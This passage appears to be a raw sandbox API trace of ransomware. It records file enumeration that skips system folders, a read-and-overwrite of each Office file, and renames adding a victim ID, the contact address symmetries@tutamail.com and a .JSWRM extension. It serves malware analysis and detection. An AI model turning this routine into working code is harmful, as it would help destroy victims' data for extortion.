lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0142.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWSHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\newshm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.341] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=333420) returned 1 [0142.341] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0142.341] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.354] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.354] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.354] CloseHandle (hObject=0x238) returned 1 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0142.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0142.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0142.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0142.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWSHM.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\newshm.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWSHM.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\newshm.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0142.356] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x241382dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x241382dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x241382dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x82e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ORIG98.POC", cAlternateFileName="")) returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2=".") returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="..") returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="...") returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="windows") returned -1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="recovery") returned -1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="perflogs") returned -1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="documents and settings") returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="system volume information") returned -1 [0142.356] lstrcmpiW (lpString1="ORIG98.POC", lpString2="msocache") returned 1 [0142.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0142.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORIG98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORIG98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORIG98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0142.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0142.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORIG98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ORIG98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ORIG98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0142.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0142.356] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.356] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0142.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ORIG98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\orig98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.357] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2094) returned 1 [0142.357] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x20c6c0 [0142.358] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0142.359] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.359] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0142.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0142.359] CloseHandle (hObject=0x238) returned 1 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0142.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0142.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ORIG98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\orig98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ORIG98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\orig98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0142.361] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x233a8be5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x233a8be5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x233cee41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PICCAP98.POC", cAlternateFileName="")) returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2=".") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="..") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="...") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="windows") returned -1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="recovery") returned -1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="perflogs") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="documents and settings") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="system volume information") returned -1 [0142.361] lstrcmpiW (lpString1="PICCAP98.POC", lpString2="msocache") returned 1 [0142.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICCAP98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICCAP98.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICCAP98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0142.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICCAP98.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICCAP98.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICCAP98.POC", lpUsedDefaultChar=0x0) returned 12 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0142.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0142.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICCAP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\piccap98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.362] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20154) returned 1 [0142.362] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.362] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4eb0) returned 0x27b348 [0142.362] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4eb0, lpOverlapped=0x0) returned 1 [0142.366] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.366] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4eb0, lpOverlapped=0x0) returned 1 [0142.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0142.366] CloseHandle (hObject=0x238) returned 1 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0142.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0142.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0142.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0142.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0142.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0142.366] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0142.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0142.366] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0142.366] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICCAP98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\piccap98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICCAP98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\piccap98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0142.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0142.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0142.367] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x237626b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x237626b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2378891a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1eac0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PICSTYLES.DPV", cAlternateFileName="PICSTY~1.DPV")) returned 1 [0142.367] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2=".") returned 1 [0142.367] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="..") returned 1 [0142.367] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="...") returned 1 [0142.367] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="windows") returned -1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="recovery") returned -1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="perflogs") returned 1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="documents and settings") returned 1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="$RECYCLE.BIN") returned 1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="system volume information") returned -1 [0142.368] lstrcmpiW (lpString1="PICSTYLES.DPV", lpString2="msocache") returned 1 [0142.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICSTYLES.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICSTYLES.DPV", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICSTYLES.DPV", lpUsedDefaultChar=0x0) returned 13 [0142.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0142.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICSTYLES.DPV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PICSTYLES.DPV", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PICSTYLES.DPV", lpUsedDefaultChar=0x0) returned 13 [0142.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0142.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0142.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0142.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\PICSTYLES.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\picstyles.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.369] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=125632) returned 1 [0142.369] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1eac0) returned 0x2501e8 [0142.369] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1eac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1eac0, lpOverlapped=0x0) returned 1 [0142.400] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.401] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1eac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1eac0, lpOverlapped=0x0) returned 1 [0142.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 